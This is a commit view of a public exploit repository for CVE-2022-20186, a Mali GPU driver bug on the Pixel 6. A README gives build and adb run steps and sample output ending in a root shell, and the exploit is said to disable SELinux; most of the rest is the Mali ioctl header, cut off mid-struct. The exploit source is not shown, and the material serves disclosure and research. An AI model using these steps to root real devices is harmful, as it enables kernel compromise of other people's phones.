CVE_2022_20186 (commit 435a1b18)
    README.md
     1 +## Exploit for CVE-2022-20186
     2 + 
     3 +The write-up can be found [here](https://github.blog/2022-07-27-corrupting-memory-without-memory-corruption/). This is a bug in the Arm Mali kernel driver that I reported in January 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
     4 + 
     5 +The exploit is tested on the Google Pixel 6 and supports patch levels from November 2021 to February 2022. It is easy to add support for other firmware by changing a few image offsets. For reference, I used the following command to compile with clang from NDK r21d:
     6 + 
     7 +```
     8 +android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang mali_alias.c -o mali_alias
     9 +```
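
Once compiled, the binary can, for example, be pushed to the device over adb and run from `/data/local/tmp` (the same location used in the sample output below); this assumes a standard adb setup:

```
adb push mali_alias /data/local/tmp/
adb shell chmod +x /data/local/tmp/mali_alias
adb shell /data/local/tmp/mali_alias
```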
     10 + 
     11 +The exploit rarely fails and can be retried without crashing the device. If successful, it should disable SELinux and gain root.
     12 + 
     13 +```
     14 +oriole:/ $ /data/local/tmp/mali_alias
     15 +fingerprint: google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys
     16 +tracking page 0x6ff794e000
     17 +drain 0x6d5b200000
     18 +gpu_va[0] 6ff6698000
     19 +gpu_va[1] 6ff6695000
     20 +alias 0x6ff6693000
     21 +overwrite addr : 6ff370051c 51c
     22 +overwrite addr : 6de310051c 51c
     23 +overwrite addr : 6d5f30051c 51c
     24 +overwrite addr : 6d5f10051c 51c
     25 +overwrite addr : 6d5f30051c 51c
     26 +overwrite addr : 6d5f10051c 51c
     27 +result 50
     28 +overwrite addr : 6ff370051c 51c
     29 +overwrite addr : 6de310051c 51c
     30 +overwrite addr : 6d5f30051c 51c
     31 +overwrite addr : 6d5f10051c 51c
     32 +overwrite addr : 6d5f30051c 51c
     33 +overwrite addr : 6d5f10051c 51c
     34 +result 50
     35 +oriole:/ #
     36 +```
     37 + 
    mali.h
     1 +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
     2 +/*
     3 + *
     4 + * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
     5 + *
     6 + * This program is free software and is provided to you under the terms of the
     7 + * GNU General Public License version 2 as published by the Free Software
     8 + * Foundation, and any use by you of this program is subject to the terms
     9 + * of such GNU license.
     10 + *
     11 + * This program is distributed in the hope that it will be useful,
     12 + * but WITHOUT ANY WARRANTY; without even the implied warranty of
     13 + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
     14 + * GNU General Public License for more details.
     15 + *
     16 + * You should have received a copy of the GNU General Public License
     17 + * along with this program; if not, you can access it online at
     18 + * http://www.gnu.org/licenses/gpl-2.0.html.
     19 + *
     20 + */
     21 + 
     22 +#ifndef _UAPI_KBASE_JM_IOCTL_H_
     23 +#define _UAPI_KBASE_JM_IOCTL_H_
     24 + 
     25 +#include <sys/ioctl.h>
     26 +#include <linux/types.h>
     27 + 
     28 +/*
     29 + * 11.1:
     30 + * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
     31 + * 11.2:
     32 + * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
     33 + * which some user-side clients prior to 11.2 might fault if they received
     34 + * them
     35 + * 11.3:
     36 + * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
     37 + * KBASE_IOCTL_STICKY_RESOURCE_UNMAP
     38 + * 11.4:
     39 + * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
     40 + * 11.5:
     41 + * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
     42 + * 11.6:
     43 + * - Added flags field to base_jit_alloc_info structure, which can be used to
     44 + * specify pseudo chunked tiler alignment for JIT allocations.
     45 + * 11.7:
     46 + * - Removed UMP support
     47 + * 11.8:
     48 + * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags
     49 + * 11.9:
     50 + * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY
     51 + * under base_mem_alloc_flags
     52 + * 11.10:
     53 + * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for
     54 + * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations
     55 + * with one softjob.
     56 + * 11.11:
     57 + * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags
     58 + * 11.12:
     59 + * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS
     60 + * 11.13:
     61 + * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT
     62 + * 11.14:
     63 + * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set
     64 + * under base_mem_alloc_flags
     65 + * 11.15:
     66 + * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags.
     67 + * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be
     68 + * passed to mmap().
     69 + * 11.16:
     70 + * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf.
     71 + * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for
     72 + * dma-buf. Now, buffers are mapped on GPU when first imported, no longer
     73 + * requiring external resource or sticky resource tracking. UNLESS,
     74 + * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled.
     75 + * 11.17:
     76 + * - Added BASE_JD_REQ_JOB_SLOT.
     77 + * - Reused padding field in base_jd_atom_v2 to pass job slot number.
     78 + * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO
     79 + * 11.18:
     80 + * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags
     81 + * 11.19:
     82 + * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified.
     83 + * 11.20:
     84 + * - Added new phys_pages member to kbase_ioctl_mem_jit_init for
     85 + * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2
     86 + * (replacing '_OLD') and _11_5 suffixes
     87 + * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in
     88 + * base_jd_atom_v2. It must currently be initialized to zero.
     89 + * - Added heap_info_gpu_addr to base_jit_alloc_info, and
     90 + * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's
     91 + * flags member. Previous variants of this structure are kept and given _10_2
     92 + * and _11_5 suffixes.
     93 + * - The above changes are checked for safe values in usual builds
     94 + * 11.21:
     95 + * - v2.0 of mali_trace debugfs file, which now versions the file separately
     96 + * 11.22:
     97 + * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2.
     98 + * KBASE_IOCTL_JOB_SUBMIT supports both in parallel.
     99 + * 11.23:
     100 + * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify
     101 + * the physical memory backing of JIT allocations. This was not supposed
     102 + * to be a valid use case, but it was allowed by the previous implementation.
     103 + * 11.24:
     104 + * - Added a sysfs file 'serialize_jobs' inside a new sub-directory
     105 + * 'scheduling'.
     106 + * 11.25:
     107 + * - Enabled JIT pressure limit in base/kbase by default
     108 + * 11.26
     109 + * - Added kinstr_jm API
     110 + * 11.27
     111 + * - Backwards compatible extension to HWC ioctl.
     112 + * 11.28:
     113 + * - Added kernel side cache ops needed hint
     114 + * 11.29:
     115 + * - Reserve ioctl 52
     116 + * 11.30:
     117 + * - Add a new priority level BASE_JD_PRIO_REALTIME
     118 + * - Add ioctl 54: This controls the priority setting.
     119 + * 11.31:
     120 + * - Added BASE_JD_REQ_LIMITED_CORE_MASK.
     121 + * - Added ioctl 55: set_limited_core_count.
     122 + */
     123 +#define BASE_UK_VERSION_MAJOR 11
     124 +#define BASE_UK_VERSION_MINOR 31
     125 + 
     126 +/**
     127 + * struct kbase_ioctl_version_check - Check version compatibility between
     128 + * kernel and userspace
     129 + *
     130 + * @major: Major version number
     131 + * @minor: Minor version number
     132 + */
     133 +struct kbase_ioctl_version_check {
     134 + __u16 major;
     135 + __u16 minor;
     136 +};
     137 + 
     138 +#define KBASE_IOCTL_VERSION_CHECK \
     139 + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)
     140 + 
     141 + 
     142 +/**
     143 + * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel
     144 + *
     145 + * @addr: Memory address of an array of struct base_jd_atom_v2 or v3
     146 + * @nr_atoms: Number of entries in the array
     147 + * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom)
     148 + */
     149 +struct kbase_ioctl_job_submit {
     150 + __u64 addr;
     151 + __u32 nr_atoms;
     152 + __u32 stride;
     153 +};
     154 + 
     155 +#define KBASE_IOCTL_JOB_SUBMIT \
     156 + _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)
     157 + 
     158 +#define KBASE_IOCTL_POST_TERM \
     159 + _IO(KBASE_IOCTL_TYPE, 4)
     160 + 
     161 +/**
     162 + * struct kbase_ioctl_soft_event_update - Update the status of a soft-event
     163 + * @event: GPU address of the event which has been updated
     164 + * @new_status: The new status to set
     165 + * @flags: Flags for future expansion
     166 + */
     167 +struct kbase_ioctl_soft_event_update {
     168 + __u64 event;
     169 + __u32 new_status;
     170 + __u32 flags;
     171 +};
     172 + 
     173 +#define KBASE_IOCTL_SOFT_EVENT_UPDATE \
     174 + _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update)
     175 + 
     176 +/**
     177 + * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for
     178 + * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the
     179 + * kernel
     180 + *
     181 + * @size: The size of the `struct kbase_kinstr_jm_atom_state_change`
     182 + * @version: Represents a breaking change in the
     183 + * `struct kbase_kinstr_jm_atom_state_change`
     184 + * @padding: Explicit padding to get the structure up to 64bits. See
     185 + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
     186 + *
     187 + * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the
     188 + * end of the structure that older user space might not understand. If the
     189 + * `version` is the same, the structure is still compatible with newer kernels.
     190 + * The `size` can be used to cast the opaque memory returned from the kernel.
     191 + */
     192 +struct kbase_kinstr_jm_fd_out {
     193 + __u16 size;
     194 + __u8 version;
     195 + __u8 padding[5];
     196 +};
     197 + 
     198 +/**
     199 + * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor
     200 + *
     201 + * @count: Number of atom states that can be stored in the kernel circular
     202 + * buffer. Must be a power of two
     203 + * @padding: Explicit padding to get the structure up to 64bits. See
     204 + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
     205 + */
     206 +struct kbase_kinstr_jm_fd_in {
     207 + __u16 count;
     208 + __u8 padding[6];
     209 +};
     210 + 
     211 +union kbase_kinstr_jm_fd {
     212 + struct kbase_kinstr_jm_fd_in in;
     213 + struct kbase_kinstr_jm_fd_out out;
     214 +};
     215 + 
     216 +#define KBASE_IOCTL_KINSTR_JM_FD \
     217 + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd)
     218 + 
     219 + 
     220 +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \
     221 + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)
     222 + 
     223 +#define KBASE_IOCTL_TYPE 0x80
     224 + 
     225 +/**
     226 + * struct kbase_ioctl_set_flags - Set kernel context creation flags
     227 + *
     228 + * @create_flags: Flags - see base_context_create_flags
     229 + */
     230 +struct kbase_ioctl_set_flags {
     231 + __u32 create_flags;
     232 +};
     233 + 
     234 +#define KBASE_IOCTL_SET_FLAGS \
     235 + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)
     236 + 
     237 +/**
     238 + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel
     239 + *
     240 + * @buffer: Pointer to the buffer to store properties into
     241 + * @size: Size of the buffer
     242 + * @flags: Flags - must be zero for now
     243 + *
     244 + * The ioctl will return the number of bytes stored into @buffer or an error
     245 + * on failure (e.g. @size is too small). If @size is specified as 0 then no
     246 + * data will be written but the return value will be the number of bytes needed
     247 + * for all the properties.
     248 + *
     249 + * @flags may be used in the future to request a different format for the
     250 + * buffer. With @flags == 0 the following format is used.
     251 + *
     252 + * The buffer will be filled with pairs of values, a __u32 key identifying the
     253 + * property followed by the value. The size of the value is identified using
      254 + * the bottom bits of the key. The value then immediately follows the key and
     255 + * is tightly packed (there is no padding). All keys and values are
     256 + * little-endian.
     257 + *
     258 + * 00 = __u8
     259 + * 01 = __u16
     260 + * 10 = __u32
     261 + * 11 = __u64
     262 + */
     263 +struct kbase_ioctl_get_gpuprops {
     264 + __u64 buffer;
     265 + __u32 size;
     266 + __u32 flags;
     267 +};
     268 + 
     269 +#define KBASE_IOCTL_GET_GPUPROPS \
     270 + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops)
     271 + 
     272 +/**
     273 + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU
     274 + * @in: Input parameters
     275 + * @in.va_pages: The number of pages of virtual address space to reserve
     276 + * @in.commit_pages: The number of physical pages to allocate
     277 + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region
     278 + * @in.flags: Flags
     279 + * @out: Output parameters
     280 + * @out.flags: Flags
     281 + * @out.gpu_va: The GPU virtual address which is allocated
     282 + */
     283 +union kbase_ioctl_mem_alloc {
     284 + struct {
     285 + __u64 va_pages;
     286 + __u64 commit_pages;
     287 + __u64 extension;
     288 + __u64 flags;
     289 + } in;
     290 + struct {
     291 + __u64 flags;
     292 + __u64 gpu_va;
     293 + } out;
     294 +};
     295 + 
     296 +#define KBASE_IOCTL_MEM_ALLOC \
     297 + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)
     298 + 
     299 +/**
     300 + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region
     301 + * @in: Input parameters
     302 + * @in.gpu_addr: A GPU address contained within the region
     303 + * @in.query: The type of query
     304 + * @out: Output parameters
     305 + * @out.value: The result of the query
     306 + *
     307 + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query.
     308 + */
     309 +union kbase_ioctl_mem_query {
     310 + struct {
     311 + __u64 gpu_addr;
     312 + __u64 query;
     313 + } in;
     314 + struct {
     315 + __u64 value;
     316 + } out;
     317 +};
     318 + 
     319 +#define KBASE_IOCTL_MEM_QUERY \
     320 + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query)
     321 + 
     322 +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1)
     323 +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2)
     324 +#define KBASE_MEM_QUERY_FLAGS ((__u64)3)
     325 + 
     326 +/**
     327 + * struct kbase_ioctl_mem_free - Free a memory region
     328 + * @gpu_addr: Handle to the region to free
     329 + */
     330 +struct kbase_ioctl_mem_free {
     331 + __u64 gpu_addr;
     332 +};
     333 + 
     334 +#define KBASE_IOCTL_MEM_FREE \
     335 + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)
     336 + 
     337 +/**
     338 + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader
     339 + * @buffer_count: requested number of dumping buffers
     340 + * @fe_bm: counters selection bitmask (Front end)
     341 + * @shader_bm: counters selection bitmask (Shader)
     342 + * @tiler_bm: counters selection bitmask (Tiler)
     343 + * @mmu_l2_bm: counters selection bitmask (MMU_L2)
     344 + *
     345 + * A fd is returned from the ioctl if successful, or a negative value on error
     346 + */
     347 +struct kbase_ioctl_hwcnt_reader_setup {
     348 + __u32 buffer_count;
     349 + __u32 fe_bm;
     350 + __u32 shader_bm;
     351 + __u32 tiler_bm;
     352 + __u32 mmu_l2_bm;
     353 +};
     354 + 
     355 +#define KBASE_IOCTL_HWCNT_READER_SETUP \
     356 + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup)
     357 + 
     358 +/**
     359 + * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection
     360 + * @dump_buffer: GPU address to write counters to
     361 + * @fe_bm: counters selection bitmask (Front end)
     362 + * @shader_bm: counters selection bitmask (Shader)
     363 + * @tiler_bm: counters selection bitmask (Tiler)
     364 + * @mmu_l2_bm: counters selection bitmask (MMU_L2)
     365 + */
     366 +struct kbase_ioctl_hwcnt_enable {
     367 + __u64 dump_buffer;
     368 + __u32 fe_bm;
     369 + __u32 shader_bm;
     370 + __u32 tiler_bm;
     371 + __u32 mmu_l2_bm;
     372 +};
     373 + 
     374 +#define KBASE_IOCTL_HWCNT_ENABLE \
     375 + _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable)
     376 + 
     377 +#define KBASE_IOCTL_HWCNT_DUMP \
     378 + _IO(KBASE_IOCTL_TYPE, 10)
     379 + 
     380 +#define KBASE_IOCTL_HWCNT_CLEAR \
     381 + _IO(KBASE_IOCTL_TYPE, 11)
     382 + 
     383 +/**
      384 + * struct kbase_ioctl_hwcnt_values - Values to set the dummy counters to.
     385 + * @data: Counter samples for the dummy model.
     386 + * @size: Size of the counter sample data.
     387 + * @padding: Padding.
     388 + */
     389 +struct kbase_ioctl_hwcnt_values {
     390 + __u64 data;
     391 + __u32 size;
     392 + __u32 padding;
     393 +};
     394 + 
     395 +#define KBASE_IOCTL_HWCNT_SET \
     396 + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values)
     397 + 
     398 +/**
     399 + * struct kbase_ioctl_disjoint_query - Query the disjoint counter
     400 + * @counter: A counter of disjoint events in the kernel
     401 + */
     402 +struct kbase_ioctl_disjoint_query {
     403 + __u32 counter;
     404 +};
     405 + 
     406 +#define KBASE_IOCTL_DISJOINT_QUERY \
     407 + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query)
     408 + 
     409 +/**
     410 + * struct kbase_ioctl_get_ddk_version - Query the kernel version
     411 + * @version_buffer: Buffer to receive the kernel version string
     412 + * @size: Size of the buffer
     413 + * @padding: Padding
     414 + *
     415 + * The ioctl will return the number of bytes written into version_buffer
     416 + * (which includes a NULL byte) or a negative error code
     417 + *
     418 + * The ioctl request code has to be _IOW because the data in ioctl struct is
     419 + * being copied to the kernel, even though the kernel then writes out the
     420 + * version info to the buffer specified in the ioctl.
     421 + */
     422 +struct kbase_ioctl_get_ddk_version {
     423 + __u64 version_buffer;
     424 + __u32 size;
     425 + __u32 padding;
     426 +};
     427 + 
     428 +#define KBASE_IOCTL_GET_DDK_VERSION \
     429 + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version)
     430 + 
     431 +/**
     432 + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory
     433 + * allocator (between kernel driver
     434 + * version 10.2--11.4)
     435 + * @va_pages: Number of VA pages to reserve for JIT
     436 + *
     437 + * Note that depending on the VA size of the application and GPU, the value
     438 + * specified in @va_pages may be ignored.
     439 + *
     440 + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
     441 + * backwards compatibility.
     442 + */
     443 +struct kbase_ioctl_mem_jit_init_10_2 {
     444 + __u64 va_pages;
     445 +};
     446 + 
     447 +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \
     448 + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2)
     449 + 
     450 +/**
     451 + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory
     452 + * allocator (between kernel driver
     453 + * version 11.5--11.19)
     454 + * @va_pages: Number of VA pages to reserve for JIT
     455 + * @max_allocations: Maximum number of concurrent allocations
     456 + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
     457 + * @group_id: Group ID to be used for physical allocations
     458 + * @padding: Currently unused, must be zero
     459 + *
     460 + * Note that depending on the VA size of the application and GPU, the value
     461 + * specified in @va_pages may be ignored.
     462 + *
     463 + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
     464 + * backwards compatibility.
     465 + */
     466 +struct kbase_ioctl_mem_jit_init_11_5 {
     467 + __u64 va_pages;
     468 + __u8 max_allocations;
     469 + __u8 trim_level;
     470 + __u8 group_id;
     471 + __u8 padding[5];
     472 +};
     473 + 
     474 +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \
     475 + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5)
     476 + 
     477 +/**
     478 + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory
     479 + * allocator
     480 + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time
     481 + * memory allocations
     482 + * @max_allocations: Maximum number of concurrent allocations
     483 + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
     484 + * @group_id: Group ID to be used for physical allocations
     485 + * @padding: Currently unused, must be zero
     486 + * @phys_pages: Maximum number of physical pages to allocate just-in-time
     487 + *
     488 + * Note that depending on the VA size of the application and GPU, the value
     489 + * specified in @va_pages may be ignored.
     490 + */
     491 +struct kbase_ioctl_mem_jit_init {
     492 + __u64 va_pages;
     493 + __u8 max_allocations;
     494 + __u8 trim_level;
     495 + __u8 group_id;
     496 + __u8 padding[5];
     497 + __u64 phys_pages;
     498 +};
     499 + 
     500 +#define KBASE_IOCTL_MEM_JIT_INIT \
     501 + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init)
     502 + 
     503 +/**
     504 + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory
     505 + *
     506 + * @handle: GPU memory handle (GPU VA)
     507 + * @user_addr: The address where it is mapped in user space
     508 + * @size: The number of bytes to synchronise
     509 + * @type: The direction to synchronise: 0 is sync to memory (clean),
     510 + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants.
     511 + * @padding: Padding to round up to a multiple of 8 bytes, must be zero
     512 + */
     513 +struct kbase_ioctl_mem_sync {
     514 + __u64 handle;
     515 + __u64 user_addr;
     516 + __u64 size;
     517 + __u8 type;
     518 + __u8 padding[7];
     519 +};
     520 + 
     521 +#define KBASE_IOCTL_MEM_SYNC \
     522 + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync)
     523 + 
     524 +/**
     525 + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer
     526 + *
     527 + * @in: Input parameters
     528 + * @in.gpu_addr: The GPU address of the memory region
     529 + * @in.cpu_addr: The CPU address to locate
     530 + * @in.size: A size in bytes to validate is contained within the region
     531 + * @out: Output parameters
     532 + * @out.offset: The offset from the start of the memory region to @cpu_addr
     533 + */
     534 +union kbase_ioctl_mem_find_cpu_offset {
     535 + struct {
     536 + __u64 gpu_addr;
     537 + __u64 cpu_addr;
     538 + __u64 size;
     539 + } in;
     540 + struct {
     541 + __u64 offset;
     542 + } out;
     543 +};
     544 + 
     545 +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \
     546 + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset)
     547 + 
     548 +/**
     549 + * struct kbase_ioctl_get_context_id - Get the kernel context ID
     550 + *
     551 + * @id: The kernel context ID
     552 + */
     553 +struct kbase_ioctl_get_context_id {
     554 + __u32 id;
     555 +};
     556 + 
     557 +#define KBASE_IOCTL_GET_CONTEXT_ID \
     558 + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id)
     559 + 
     560 +/**
     561 + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd
     562 + *
     563 + * @flags: Flags
     564 + *
     565 + * The ioctl returns a file descriptor when successful
     566 + */
     567 +struct kbase_ioctl_tlstream_acquire {
     568 + __u32 flags;
     569 +};
     570 + 
     571 +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \
     572 + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire)
     573 + 
     574 +#define KBASE_IOCTL_TLSTREAM_FLUSH \
     575 + _IO(KBASE_IOCTL_TYPE, 19)
     576 + 
     577 +/**
     578 + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region
     579 + *
     580 + * @gpu_addr: The memory region to modify
     581 + * @pages: The number of physical pages that should be present
     582 + *
     583 + * The ioctl may return on the following error codes or 0 for success:
     584 + * -ENOMEM: Out of memory
     585 + * -EINVAL: Invalid arguments
     586 + */
     587 +struct kbase_ioctl_mem_commit {
     588 + __u64 gpu_addr;
     589 + __u64 pages;
     590 +};
     591 + 
     592 +#define KBASE_IOCTL_MEM_COMMIT \
     593 + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)
     594 + 
     595 +/**
     596 + * union kbase_ioctl_mem_alias - Create an alias of memory regions
     597 + * @in: Input parameters
     598 + * @in.flags: Flags, see BASE_MEM_xxx
     599 + * @in.stride: Bytes between start of each memory region
     600 + * @in.nents: The number of regions to pack together into the alias
     601 + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info
     602 + * @out: Output parameters
     603 + * @out.flags: Flags, see BASE_MEM_xxx
     604 + * @out.gpu_va: Address of the new alias
     605 + * @out.va_pages: Size of the new alias
     606 + */
     607 +union kbase_ioctl_mem_alias {
     608 + struct {
     609 + __u64 flags;
     610 + __u64 stride;
     611 + __u64 nents;
     612 + __u64 aliasing_info;
     613 + } in;
     614 + struct {
     615 + __u64 flags;
     616 + __u64 gpu_va;
     617 + __u64 va_pages;
     618 + } out;
     619 +};
     620 + 
     621 +#define KBASE_IOCTL_MEM_ALIAS \
     622 + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias)
     623 + 
     624 +/**
     625 + * union kbase_ioctl_mem_import - Import memory for use by the GPU
     626 + * @in: Input parameters
     627 + * @in.flags: Flags, see BASE_MEM_xxx
     628 + * @in.phandle: Handle to the external memory
     629 + * @in.type: Type of external memory, see base_mem_import_type
     630 + * @in.padding: Amount of extra VA pages to append to the imported buffer
     631 + * @out: Output parameters
     632 + * @out.flags: Flags, see BASE_MEM_xxx
     633 + * @out.gpu_va: Address of the new alias
     634 + * @out.va_pages: Size of the new alias
     635 + */
     636 +union kbase_ioctl_mem_import {
     637 + struct {
     638 + __u64 flags;
     639 + __u64 phandle;
     640 + __u32 type;
     641 + __u32 padding;
     642 + } in;
     643 + struct {
     644 + __u64 flags;
     645 + __u64 gpu_va;
     646 + __u64 va_pages;
     647 + } out;
     648 +};
     649 + 
     650 +#define KBASE_IOCTL_MEM_IMPORT \
     651 + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)
     652 + 
     653 +/**
     654 + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region
     655 + * @gpu_va: The GPU region to modify
     656 + * @flags: The new flags to set
     657 + * @mask: Mask of the flags to modify
     658 + */
     659 +struct kbase_ioctl_mem_flags_change {
     660 + __u64 gpu_va;
     661 + __u64 flags;
     662 + __u64 mask;
     663 +};
     664 + 
     665 +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \
     666 + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change)
     667 + 
     668 +/**
     669 + * struct kbase_ioctl_stream_create - Create a synchronisation stream
     670 + * @name: A name to identify this stream. Must be NULL-terminated.
     671 + *
     672 + * Note that this is also called a "timeline", but is named stream to avoid
     673 + * confusion with other uses of the word.
     674 + *
      675 + * Unused bytes in @name (after the first NULL byte) must also be NULL bytes.
     676 + *
     677 + * The ioctl returns a file descriptor.
     678 + */
     679 +struct kbase_ioctl_stream_create {
     680 + char name[32];
     681 +};
     682 + 
     683 +#define KBASE_IOCTL_STREAM_CREATE \
     684 + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create)
     685 + 
     686 +/**
     687 + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence
     688 + * @fd: The file descriptor to validate
     689 + */
     690 +struct kbase_ioctl_fence_validate {
     691 + int fd;
     692 +};
     693 + 
     694 +#define KBASE_IOCTL_FENCE_VALIDATE \
     695 + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate)
     696 + 
     697 +/**
     698 + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
     699 + * @buffer: Pointer to the information
     700 + * @len: Length
     701 + * @padding: Padding
     702 + *
     703 + * The data provided is accessible through a debugfs file
     704 + */
     705 +struct kbase_ioctl_mem_profile_add {
     706 + __u64 buffer;
     707 + __u32 len;
     708 + __u32 padding;
     709 +};
     710 + 
     711 +#define KBASE_IOCTL_MEM_PROFILE_ADD \
     712 + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)
     713 + 
     714 +/**
     715 + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource
     716 + * @count: Number of resources
     717 + * @address: Array of __u64 GPU addresses of the external resources to map
     718 + */
     719 +struct kbase_ioctl_sticky_resource_map {
     720 + __u64 count;
     721 + __u64 address;
     722 +};
     723 + 
     724 +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \
     725 + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map)
     726 + 
     727 +/**
      728 + * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource which was
     729 + * previously permanently mapped
     730 + * @count: Number of resources
     731 + * @address: Array of __u64 GPU addresses of the external resources to unmap
     732 + */
     733 +struct kbase_ioctl_sticky_resource_unmap {
